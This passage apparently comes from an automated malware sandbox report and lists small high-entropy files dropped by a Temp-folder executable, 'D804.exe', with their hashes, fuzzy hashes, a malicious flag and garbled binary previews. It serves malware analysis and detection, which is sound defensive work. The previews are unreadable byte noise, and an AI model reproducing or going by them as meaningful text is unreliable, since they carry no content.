                                                                                                                            Preview:CZQKST.^$.....S..w[.W.&.s....k...d.1G.s..u..W....&......O;...e....fS....Pvt..D...YA;..V..t.#..}../kA\U.Ux}.v)...f..q.\$..a.X.9K..0....j.U&D...B...r.z.p.......v..o..]..@..g.p../.=.Z.!].T.)K....}v......"9....4..!_^H.4.{.O,.."..;K..ZC.Y|.W\...Q...=....<.z....;!... y.X...S...h.hg......&.......w.[...'.x....<...)....v.ScV}^60..V(=F...*....s?..>.....[...JM..\.(.Z.t.....$..Fy...h4..Yj......\...4....i..3iT.}...P/#.r.(l....-0.bl...=..S..r....M.:\.zA*..k..)W..j..0C..)..'.........I.k ........).%....f...n.}...L.......a...#84.&..U. @.t~..../..;.^.n..i.+.....I>.;...M.T..\....mzE@.l.YNC...N3.r.#Zh..I.&.;..]E.e.A.(M .e...&.^k,W../.zk'.l?....s.#qEH..r.....1[..~.>ke'Y....BE.....M....o!#.eC..f.V[i...i|{."..]...S.......{?l.c=.P...".?f..."7.]..;.[...8..1G4.z...v.W..p.V(....Y..'.+..,..D{%<....\....ngnc..k..$..<..C...mu.%!./..E...d...?}E.....|..~...H..>...1S)RU..A.(.~..B..9t*.j..I....K..b....T.#..T.......F....^I8.F...R......]...b..e.Q.._.m.G.W8tkB.c.lQ..$...bG
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.858838390859525
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:3y3l5QjWiby3yS9+A9zUkETmdv9iAG482muCh93NB7bD:i3lMa9P9okETmvDdo9dB/D
                                                                                                                            MD5:F7C0A521155D3CD6393BA9E551917D2F
                                                                                                                            SHA1:073C1B990B59024F480A2D3106CE7DF32B2552B6
                                                                                                                            SHA-256:53D5B6B48B45B4589F68560B96C99E1243818803E21A614612C6EF69BCBEDDB7
                                                                                                                            SHA-512:D2FD864776B351F7942619DC1C147EF9384F9C53455E0DF440661EDF205997B082E4D6D68762F1386DEF2F088BD62AD5DEE0F2ECB85E6C61967C3B10649E2EB9
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:GLTYD...q09....<.j..P......Y.u~..i....g.......17...$......s....& ....(<D.#...-...<.'9...".vn$..o..F .F.s..=..3Y.'.$.iJ.5.2...(.M[}...P....6.m.L..Q...pM...j.....0. ).&...c.B..p/6..7...B6XB['9.6...G......A..D.......qG.....53.[.bP...'Mc.y'..[.....rn..~4"....+I...~.....01_".pE..rj+@a....y....#k....Q.5.t$|]..YY=.D.,...hf2...N...l..J.d.<....)c....i.%.7..{<.|....ci.{..'3*..H..../....R..p.X.......D.'xM..M.V..n|.2Z...ia.R..Fv.&.....3f\.F.....5[i..O.R.-..eeSw.Tk...8..E..j..#h.t/@.'`.^.$....#..;...|.Z.J._......U..&.'.[|...@.(..xq.:....l.T.'T.>.R.uX..5Mv...=.......D....'.7R....]..F@F[T........l....=.b.L;...L.m.......F\.C....[Z..9........a.Yg..+...0j.'....e..P..b.1Hf..N.)=....W.e.....Q.u....).lx...b.G[..@.j..;...'.....~fg+..!....._..-.,..-\3K.X}.i4....h)..........P.j.?.1jW$....,h.J$.g...$..A.M ...aax...Q...`YD...8_....}eVPK.]$W.7.O.^........c.\j.5..4).z...n.e.TM.uD:.K.w._"..../..HC..K..z.. ...4.K..O.U.\..eY....&..N...d.n....JTj...H........+..&v.D....
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.858838390859525
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:3y3l5QjWiby3yS9+A9zUkETmdv9iAG482muCh93NB7bD:i3lMa9P9okETmvDdo9dB/D
                                                                                                                            MD5:F7C0A521155D3CD6393BA9E551917D2F
                                                                                                                            SHA1:073C1B990B59024F480A2D3106CE7DF32B2552B6
                                                                                                                            SHA-256:53D5B6B48B45B4589F68560B96C99E1243818803E21A614612C6EF69BCBEDDB7
                                                                                                                            SHA-512:D2FD864776B351F7942619DC1C147EF9384F9C53455E0DF440661EDF205997B082E4D6D68762F1386DEF2F088BD62AD5DEE0F2ECB85E6C61967C3B10649E2EB9
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:GLTYD...q09....<.j..P......Y.u~..i....g.......17...$......s....& ....(<D.#...-...<.'9...".vn$..o..F .F.s..=..3Y.'.$.iJ.5.2...(.M[}...P....6.m.L..Q...pM...j.....0. ).&...c.B..p/6..7...B6XB['9.6...G......A..D.......qG.....53.[.bP...'Mc.y'..[.....rn..~4"....+I...~.....01_".pE..rj+@a....y....#k....Q.5.t$|]..YY=.D.,...hf2...N...l..J.d.<....)c....i.%.7..{<.|....ci.{..'3*..H..../....R..p.X.......D.'xM..M.V..n|.2Z...ia.R..Fv.&.....3f\.F.....5[i..O.R.-..eeSw.Tk...8..E..j..#h.t/@.'`.^.$....#..;...|.Z.J._......U..&.'.[|...@.(..xq.:....l.T.'T.>.R.uX..5Mv...=.......D....'.7R....]..F@F[T........l....=.b.L;...L.m.......F\.C....[Z..9........a.Yg..+...0j.'....e..P..b.1Hf..N.)=....W.e.....Q.u....).lx...b.G[..@.j..;...'.....~fg+..!....._..-.,..-\3K.X}.i4....h)..........P.j.?.1jW$....,h.J$.g...$..A.M ...aax...Q...`YD...8_....}eVPK.]$W.7.O.^........c.\j.5..4).z...n.e.TM.uD:.K.w._"..../..HC..K..z.. ...4.K..O.U.\..eY....&..N...d.n....JTj...H........+..&v.D....
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.870393822177167
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:xh4mCvPCx0uriZ2bOxs5YyDRu/ZiARVf3VnAb57fYIgUdbD:/4mCHCx0uUs5VIBzRVfFgfMUdD
                                                                                                                            MD5:AD097AF44D2CBB48AECE31913B6FB9FE
                                                                                                                            SHA1:6F92F50F8D0DAC425CC71DD0962EA57CB36A85DD
                                                                                                                            SHA-256:367074A82414CB4B534370783B64E2CD69B12E465C952749DE183F49ECC03BC1
                                                                                                                            SHA-512:5067E8749EB7A83F03AADA2C793E9674276FA09DD6A8894799BC3E3ED34C01564A6D868697C453FFC40274367ACECA837572D1EFD71AC8009645CEC4D37F7DA7
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:GLTYD...>.9.l.3..........l......Z_&.]@..J'....4n.r3..G....8/.q....J...s.ci`.6.AQ...D %...1..(..S\@f......wl..X.....T.cJG..ZJ.K.....s.... 8.C.1..^*.~......c..M{.".J.E...4..F.J.Lp.Z......1g_...&.s..d.K...3.y.@...c..F...^mx#.b..U.o........;....'b.*..8 ..i.....d.......Z|3.....l..]..w.D.....s..$;_....m.+..=+..r.c..[.XD.t=.w....j....iK..Y5n...zce.L....TT......k..M..?LB....|Z....-...!...8^#o.}...lZ{...@)..t.e}.G8.^.V.KTApe/.,..ZE....t.V...$... ..X.....9...0w.....TQ...(.k.`...{...G,B......k7.....>..y./%.f..j.]..E..}...45.........my......[........s........|x...Z..?....Hv*..A5"x.:..Q.".u..@.u....7..W3..Qt%...V/!..a.k0.M..z.."y...q........QD} f.LO..b..G.x+.8.t...~..@q..`.X...j.S..Tq.....F.nP~...O.l.q...}.8....&...]$`....Zc.'.'....<.....5A.a|..s.j.......4-WFUH9B..C*.."q../H"...q..3r9.k.~W..y.02.M......Uw...%e_Q.A....(....*h.}..H']*J ......./Y..i..'(..[.d.....r.z8?.Cf...oS9.........y..}......ZX..i.1.Hd|qYp..8..I.w.............U.....
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.870393822177167
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:xh4mCvPCx0uriZ2bOxs5YyDRu/ZiARVf3VnAb57fYIgUdbD:/4mCHCx0uUs5VIBzRVfFgfMUdD
                                                                                                                            MD5:AD097AF44D2CBB48AECE31913B6FB9FE
                                                                                                                            SHA1:6F92F50F8D0DAC425CC71DD0962EA57CB36A85DD
                                                                                                                            SHA-256:367074A82414CB4B534370783B64E2CD69B12E465C952749DE183F49ECC03BC1
                                                                                                                            SHA-512:5067E8749EB7A83F03AADA2C793E9674276FA09DD6A8894799BC3E3ED34C01564A6D868697C453FFC40274367ACECA837572D1EFD71AC8009645CEC4D37F7DA7
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:GLTYD...>.9.l.3..........l......Z_&.]@..J'....4n.r3..G....8/.q....J...s.ci`.6.AQ...D %...1..(..S\@f......wl..X.....T.cJG..ZJ.K.....s.... 8.C.1..^*.~......c..M{.".J.E...4..F.J.Lp.Z......1g_...&.s..d.K...3.y.@...c..F...^mx#.b..U.o........;....'b.*..8 ..i.....d.......Z|3.....l..]..w.D.....s..$;_....m.+..=+..r.c..[.XD.t=.w....j....iK..Y5n...zce.L....TT......k..M..?LB....|Z....-...!...8^#o.}...lZ{...@)..t.e}.G8.^.V.KTApe/.,..ZE....t.V...$... ..X.....9...0w.....TQ...(.k.`...{...G,B......k7.....>..y./%.f..j.]..E..}...45.........my......[........s........|x...Z..?....Hv*..A5"x.:..Q.".u..@.u....7..W3..Qt%...V/!..a.k0.M..z.."y...q........QD} f.LO..b..G.x+.8.t...~..@q..`.X...j.S..Tq.....F.nP~...O.l.q...}.8....&...]$`....Zc.'.'....<.....5A.a|..s.j.......4-WFUH9B..C*.."q../H"...q..3r9.k.~W..y.02.M......Uw...%e_Q.A....(....*h.}..H']*J ......./Y..i..'(..[.d.....r.z8?.Cf...oS9.........y..}......ZX..i.1.Hd|qYp..8..I.w.............U.....
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.856079400934414
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:niXk52wiDrzc+SSTYqOUKNDD2Y98mp9LK50Gp9eKRamxyB2aheP5vhKmm6mkybD:niXYiD08WUKNDCY98mp9KSGTeK88ahc2
                                                                                                                            MD5:3CEA4C1502F0D6EE0DFD5B465DE0F718
                                                                                                                            SHA1:04E287E9D3B7E72C8CD6FA1DBB27E846B6E0ACAB
                                                                                                                            SHA-256:E771DC120F3BB48BA77BC0F8B8D07769265635D277EF085BB7632DDC1AC12A06
                                                                                                                            SHA-512:F2D8609AC8E8478C6787F73BC98E2054D0BD9D848F4E28F1E0DB6173D528DA35BD00B7BD39CD5F8AC227566493C8A305545F7E0F3D4B3639136F49E1576C2499
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:GLTYDVD..W.w.F%/6Z...&$z....P@.........".......H.f./...V.....|G.gB7C.R..M.<.../..p.=..'..d8n2|4.....q...j...c|..).m.O.cr..c.....ig)....~A..y..x.Kz..@...rb.."(i....EW}.......K...|....J.....xOM.N+#Q|.......Vg..)...........,..a.........m.!...m.Vg..X.=hI...E>.X.Ke..H'....$.K..._..57v<.o.....3F...jH.:..o...O..&.7......P....../....l;...B.v....vy..J.BN@..n...'dm.._.~w.m.Z.Pq.....Z.j\.w^.{....q.OQ....-...z.O.........f...=..IBl..l.48....(..I\.<#.%.8;...3^51.......N(..[...}..pmk....b.+J.yE~...^.m.w5...?...c+M.|[].P...}.N.B.F.....-qv^......F...i......}.I...U?u...jcq..Q.[......c.."E...cU...jNa.g...s.s..I........{_..`...y.@.._......q..._...........K2..z.9&...<..Mn.F.i.W..6r......$..n.S\.........ss.~.........,U..0....&."..I.f{W..A!.^..6.S./...v..i)..7P....T)..._$A.......K..T.!...y.G..#...v.....D..X....u|x.8f.nh3..JO.<.X.S.C.[WCS..Kc..N.T"h.9....M.J..-H.5....,..2.s.6...:i`,.ud0.o.v.C.D.B..]j...g.Wq...........$..lz.......Dw.D............
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.856079400934414
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:niXk52wiDrzc+SSTYqOUKNDD2Y98mp9LK50Gp9eKRamxyB2aheP5vhKmm6mkybD:niXYiD08WUKNDCY98mp9KSGTeK88ahc2
                                                                                                                            MD5:3CEA4C1502F0D6EE0DFD5B465DE0F718
                                                                                                                            SHA1:04E287E9D3B7E72C8CD6FA1DBB27E846B6E0ACAB
                                                                                                                            SHA-256:E771DC120F3BB48BA77BC0F8B8D07769265635D277EF085BB7632DDC1AC12A06
                                                                                                                            SHA-512:F2D8609AC8E8478C6787F73BC98E2054D0BD9D848F4E28F1E0DB6173D528DA35BD00B7BD39CD5F8AC227566493C8A305545F7E0F3D4B3639136F49E1576C2499
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:GLTYDVD..W.w.F%/6Z...&$z....P@.........".......H.f./...V.....|G.gB7C.R..M.<.../..p.=..'..d8n2|4.....q...j...c|..).m.O.cr..c.....ig)....~A..y..x.Kz..@...rb.."(i....EW}.......K...|....J.....xOM.N+#Q|.......Vg..)...........,..a.........m.!...m.Vg..X.=hI...E>.X.Ke..H'....$.K..._..57v<.o.....3F...jH.:..o...O..&.7......P....../....l;...B.v....vy..J.BN@..n...'dm.._.~w.m.Z.Pq.....Z.j\.w^.{....q.OQ....-...z.O.........f...=..IBl..l.48....(..I\.<#.%.8;...3^51.......N(..[...}..pmk....b.+J.yE~...^.m.w5...?...c+M.|[].P...}.N.B.F.....-qv^......F...i......}.I...U?u...jcq..Q.[......c.."E...cU...jNa.g...s.s..I........{_..`...y.@.._......q..._...........K2..z.9&...<..Mn.F.i.W..6r......$..n.S\.........ss.~.........,U..0....&."..I.f{W..A!.^..6.S./...v..i)..7P....T)..._$A.......K..T.!...y.G..#...v.....D..X....u|x.8f.nh3..JO.<.X.S.C.[WCS..Kc..N.T"h.9....M.J..-H.5....,..2.s.6...:i`,.ud0.o.v.C.D.B..]j...g.Wq...........$..lz.......Dw.D............
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.8483102131416524
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:ZecFoShyYCsIX0hUP4yLHY5bXaYSGKEeYQVxRI2ckAJztuxbD:ZxGSsYCsLhUjoHSbWQVxRI2ck6ZMD
                                                                                                                            MD5:94CEA18659A3DB14A08D113EE33C9DC3
                                                                                                                            SHA1:C60D7FC52E907AE42AFD367B8FD011C99ED23366
                                                                                                                            SHA-256:3586F2EB7576FCB0DFD09679267BAE1C0EAA94E4982C72CD470F971C67BE7AB6
                                                                                                                            SHA-512:F44F97FF9EB55EBF656B73F3F2C26310E827D4C029E18B16620791EF9E3F2EF267368392A6CA6B8A964140026712A646D30AC872B6A4EFED3E9CA2B7582321C7
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:GNLQNE..V.?l*}6....3..S.eg..z.6..w.X{1....6...[............1"......Q......|,.&.M......v..kE.[.8.+...2...W.f%..^....0e.;~..,U>I.../.........-_i..`..x*....n.8G;...T...w..Sl...Al....Y....NY../..]..>..=...o..g........,....._\..v8.s.B.9......i,.......`..!.pW+..rx&Ax.%s.g...+)H(..!\..;\.tL..S..H.."g.2.B..J....V......?..w......Su=.S...&..x`.}....1.....'..|.!<.p.F.:.c4......|.....%...?..G.d.A7H?o...*Atg..;G...|....i>.....he.9.8....:.....>E._.fh...=y.>.g|.2....Vm....jNK.?lOVI....[.qA^...!...@...E.b..Z...(.(..J..:.5..].eT].Y._..V.@.s......u8q.eF#."..w...B...-......L....o..c.}.......(.N#...S?".@..j...k...%E.5~.+.hK.kO......F..j.S......MT 2.<.....|,. j#...r.v.x..m..[.Z?.W..H3G._#5f.G...V.n....[5...._./,......,..H.%]..%(^,.kRf......=.P.c..aS..G.]"..p..8.h..#..\.3..7s....8LW...........)..z..\Z....gm...9y........,5..D<..."....'.=z..p.6.....E......#..}..K.L.<..}.Tm..U|.!.\.w...fDq. ..Y....U.,..7.w7/8..B.7 ).V..PQT....8.......@.w.4>........?.
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.8483102131416524
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:ZecFoShyYCsIX0hUP4yLHY5bXaYSGKEeYQVxRI2ckAJztuxbD:ZxGSsYCsLhUjoHSbWQVxRI2ck6ZMD
                                                                                                                            MD5:94CEA18659A3DB14A08D113EE33C9DC3
                                                                                                                            SHA1:C60D7FC52E907AE42AFD367B8FD011C99ED23366
                                                                                                                            SHA-256:3586F2EB7576FCB0DFD09679267BAE1C0EAA94E4982C72CD470F971C67BE7AB6
                                                                                                                            SHA-512:F44F97FF9EB55EBF656B73F3F2C26310E827D4C029E18B16620791EF9E3F2EF267368392A6CA6B8A964140026712A646D30AC872B6A4EFED3E9CA2B7582321C7
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:GNLQNE..V.?l*}6....3..S.eg..z.6..w.X{1....6...[............1"......Q......|,.&.M......v..kE.[.8.+...2...W.f%..^....0e.;~..,U>I.../.........-_i..`..x*....n.8G;...T...w..Sl...Al....Y....NY../..]..>..=...o..g........,....._\..v8.s.B.9......i,.......`..!.pW+..rx&Ax.%s.g...+)H(..!\..;\.tL..S..H.."g.2.B..J....V......?..w......Su=.S...&..x`.}....1.....'..|.!<.p.F.:.c4......|.....%...?..G.d.A7H?o...*Atg..;G...|....i>.....he.9.8....:.....>E._.fh...=y.>.g|.2....Vm....jNK.?lOVI....[.qA^...!...@...E.b..Z...(.(..J..:.5..].eT].Y._..V.@.s......u8q.eF#."..w...B...-......L....o..c.}.......(.N#...S?".@..j...k...%E.5~.+.hK.kO......F..j.S......MT 2.<.....|,. j#...r.v.x..m..[.Z?.W..H3G._#5f.G...V.n....[5...._./,......,..H.%]..%(^,.kRf......=.P.c..aS..G.]"..p..8.h..#..\.3..7s....8LW...........)..z..\Z....gm...9y........,5..D<..."....'.=z..p.6.....E......#..}..K.L.<..}.Tm..U|.!.\.w...fDq. ..Y....U.,..7.w7/8..B.7 ).V..PQT....8.......@.w.4>........?.
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.858829878894281
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:tIRgimxkoBiPNKqXWv9kcGBCJySHVuXZZzlgmT/gOAVNrtC5kytOPObD:tIqimxkRKupeXYZZzlgvyisD
                                                                                                                            MD5:7F053371DFF62D82119164F040B6C9E9
                                                                                                                            SHA1:14A0279F63A9F7EEB36ADCEB8717EDAF933EED33
                                                                                                                            SHA-256:C839868C8A1FAE239DA80B158C78F0F3024035BE864BA17B5C1A3EBE95664FD6
                                                                                                                            SHA-512:D644388F401F3C9B899B01DD174062DDBC7A2471BE147AE4A31A0B610CE06C57804DC8F4C88C3A66D2BAAA5817959054C069EA8646AA4F190D7513037545F50E
                                                                                                                            Malicious:true
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:HMPPS.. *....H.`.\.0....`.OB.q[O.....Z.'.3^.6v.Sc~.y.^..q .FD1....Pm..!.He....v...Z7..)@f4h...a......w.../...mM.....v.......f..\.4..9.9vY!L..JZ&w.1rt...c.....\b&Vm...^f*..(...@...h'...;.^%...]...TW..<(x.X ....E..u.+4........X..$_...:.0.`.n.....w....o. .Bu].......2V...bR..w.If.fE...iY..;.J?X..+B.K7..\.w.q........_....#.>o.e.O......Nj!{Y...W;q...sz.?....@.a.cS.../.V.L../.\E%..q.eGo..T......*........V.T..AU..]....MJ...U_.^.Z&.....z..L0.....^.SAt.|q....Sq.B._...s.O.&Bv?...^....v...?.....-...w......o:/T+>.h.&.y.7.Aj.0._.O........w...{.0$n^..l.Q..-M.O.m.!&"Y.u.Y.2OF.] {..[.Fg.8>A.w.T.....N..U z.i.:..@...S....D....M..>...M..@&T~.(......./.]..J.\g2..+.bp....?.....jX.."0...S..`...[#.I{./.zd.........9#.;........ E.....#.l..<=...`.{.cLb..z..7.)...F.k>...w.....f.C...?..g...(...U.,......-....Vf....R;.m...\SE.y...............)w#%.G.....K.\b.. ....@.>.VlOg.J.;.S.~...........A....W..~~.M{j....;.....K..].2.....?......P..u6..@:.rm_L.P.QND...%..y..^@
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.858829878894281
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:tIRgimxkoBiPNKqXWv9kcGBCJySHVuXZZzlgmT/gOAVNrtC5kytOPObD:tIqimxkRKupeXYZZzlgvyisD
                                                                                                                            MD5:7F053371DFF62D82119164F040B6C9E9
                                                                                                                            SHA1:14A0279F63A9F7EEB36ADCEB8717EDAF933EED33
                                                                                                                            SHA-256:C839868C8A1FAE239DA80B158C78F0F3024035BE864BA17B5C1A3EBE95664FD6
                                                                                                                            SHA-512:D644388F401F3C9B899B01DD174062DDBC7A2471BE147AE4A31A0B610CE06C57804DC8F4C88C3A66D2BAAA5817959054C069EA8646AA4F190D7513037545F50E
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:HMPPS.. *....H.`.\.0....`.OB.q[O.....Z.'.3^.6v.Sc~.y.^..q .FD1....Pm..!.He....v...Z7..)@f4h...a......w.../...mM.....v.......f..\.4..9.9vY!L..JZ&w.1rt...c.....\b&Vm...^f*..(...@...h'...;.^%...]...TW..<(x.X ....E..u.+4........X..$_...:.0.`.n.....w....o. .Bu].......2V...bR..w.If.fE...iY..;.J?X..+B.K7..\.w.q........_....#.>o.e.O......Nj!{Y...W;q...sz.?....@.a.cS.../.V.L../.\E%..q.eGo..T......*........V.T..AU..]....MJ...U_.^.Z&.....z..L0.....^.SAt.|q....Sq.B._...s.O.&Bv?...^....v...?.....-...w......o:/T+>.h.&.y.7.Aj.0._.O........w...{.0$n^..l.Q..-M.O.m.!&"Y.u.Y.2OF.] {..[.Fg.8>A.w.T.....N..U z.i.:..@...S....D....M..>...M..@&T~.(......./.]..J.\g2..+.bp....?.....jX.."0...S..`...[#.I{./.zd.........9#.;........ E.....#.l..<=...`.{.cLb..z..7.)...F.k>...w.....f.C...?..g...(...U.,......-....Vf....R;.m...\SE.y...............)w#%.G.....K.\b.. ....@.>.VlOg.J.;.S.~...........A....W..~~.M{j....;.....K..].2.....?......P..u6..@:.rm_L.P.QND...%..y..^@
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.848466650261886
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:x/yaK9IcgWn0QdU8VDdWV2BX3esqtuwL67TcaTrvER756gbravkz2juPgwB2DIO4:x/yaKUDG3zHV3WLOlT8756gf70u4woDO
                                                                                                                            MD5:D88517C21D71608B72F880E2F995CE23
                                                                                                                            SHA1:4A25213AB601CAF49C1ABD802FA28A489CCE80E7
                                                                                                                            SHA-256:1A27D850C6DFC356929F75E104FD71143007C2F869CCACAB66D9E6464FBB2354
                                                                                                                            SHA-512:E29795E1440855E48FD0D14E291EC4986179E9507BC589471A9DD81F23E4CB208D0C8257FF63CA67B5123904730700CCF59AB9661E8B7B409F12B7F2A8F0EC97
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:HQJBR.Q...@$K.q'u.G;.ICN2..5..W..8.........3..|E6C.n.B.n..@...O.....r..n....a...h.F....h.iA...{..1/...6..J5..f.."Q\a.k0;;.....%......z...d,"..@.z&.0.....e(y.6q....4*..o..ua.H..(o.m..L.2..q..0k.|.&y...,..u.`.....s..&..K.%8k|N...y'.....-Ah.......T... .E..4..u......\.R.;e.B.q]........D.'.......#.0Pu.*r..D......L...Cg.G.jr,]Ve9.KY......mxB....!q@...*%.\.k.V.(%..R.?.\...m....B.-.-..%PuB....v...a..O...k.jU.$fF&.....-P.j.(_..M..,?.....c..r.a........rq:...lZ"..X.....0..#..(..K.........$..w.c..u...a(k....2;...|...b..O..9t:.6Y.J....g..$8^...w.r.....`..E.b;|..........M.Fq.o...!=.W..!lP..!9......d|U>.e.?..]....*.,..../'.U...%..=<..GR.,l(.t.H.....b..|.zkk..<...5..m..U....F.^.....J.$D.?,.3..\..D..u.+|#...NryR.....{&2.f.-7-..W....|......Y.=o"..Z...)V...[..J+.W....NS.$...c\.r..T.W.$....B.....4...z.L.a.[_...(n..!-...Z%..W...e*.7..{*.5..../.p..n.IM.(...P..`.....$.so.<.Fj2l...X.'......0.z$Gd.....\]..p....\.GH.......Oe.EY..<+..7`h.}.f."........9...m.C..6.Y
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.848466650261886
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:x/yaK9IcgWn0QdU8VDdWV2BX3esqtuwL67TcaTrvER756gbravkz2juPgwB2DIO4:x/yaKUDG3zHV3WLOlT8756gf70u4woDO
                                                                                                                            MD5:D88517C21D71608B72F880E2F995CE23
                                                                                                                            SHA1:4A25213AB601CAF49C1ABD802FA28A489CCE80E7
                                                                                                                            SHA-256:1A27D850C6DFC356929F75E104FD71143007C2F869CCACAB66D9E6464FBB2354
                                                                                                                            SHA-512:E29795E1440855E48FD0D14E291EC4986179E9507BC589471A9DD81F23E4CB208D0C8257FF63CA67B5123904730700CCF59AB9661E8B7B409F12B7F2A8F0EC97
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:HQJBR.Q...@$K.q'u.G;.ICN2..5..W..8.........3..|E6C.n.B.n..@...O.....r..n....a...h.F....h.iA...{..1/...6..J5..f.."Q\a.k0;;.....%......z...d,"..@.z&.0.....e(y.6q....4*..o..ua.H..(o.m..L.2..q..0k.|.&y...,..u.`.....s..&..K.%8k|N...y'.....-Ah.......T... .E..4..u......\.R.;e.B.q]........D.'.......#.0Pu.*r..D......L...Cg.G.jr,]Ve9.KY......mxB....!q@...*%.\.k.V.(%..R.?.\...m....B.-.-..%PuB....v...a..O...k.jU.$fF&.....-P.j.(_..M..,?.....c..r.a........rq:...lZ"..X.....0..#..(..K.........$..w.c..u...a(k....2;...|...b..O..9t:.6Y.J....g..$8^...w.r.....`..E.b;|..........M.Fq.o...!=.W..!lP..!9......d|U>.e.?..]....*.,..../'.U...%..=<..GR.,l(.t.H.....b..|.zkk..<...5..m..U....F.^.....J.$D.?,.3..\..D..u.+|#...NryR.....{&2.f.-7-..W....|......Y.=o"..Z...)V...[..J+.W....NS.$...c\.r..T.W.$....B.....4...z.L.a.[_...(n..!-...Z%..W...e*.7..{*.5..../.p..n.IM.(...P..`.....$.so.<.Fj2l...X.'......0.z$Gd.....\]..p....\.GH.......Oe.EY..<+..7`h.}.f."........9...m.C..6.Y
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.822811184260018
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:y4dWOKIpjkUrwXRdbdelWYR3vEfCeXjtnubPToIJdwSvcPrJoUQEIZo7bD:yfO/tkUKdbaWi3vE1jdEPzB0PrwEGED
                                                                                                                            MD5:7A0C7E6D65962EFB7F74D1C8E9224519
                                                                                                                            SHA1:2778C98C36E47AD89F5E52E11DDFD88B78AAF5F0
                                                                                                                            SHA-256:59D6FFAD1474FD2D62F8CC6B102690B0CDE2C071255DF11A0295EEE49ABED6AF
                                                                                                                            SHA-512:40E6EC378E85330E57094A93E10FB1B6A19FE661119EADFEDBB7A1C33A5C1AFB293129339E0F41C3030AC129D4D2448C6EFAB3497DA621E44FE5BFDE3743E527
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
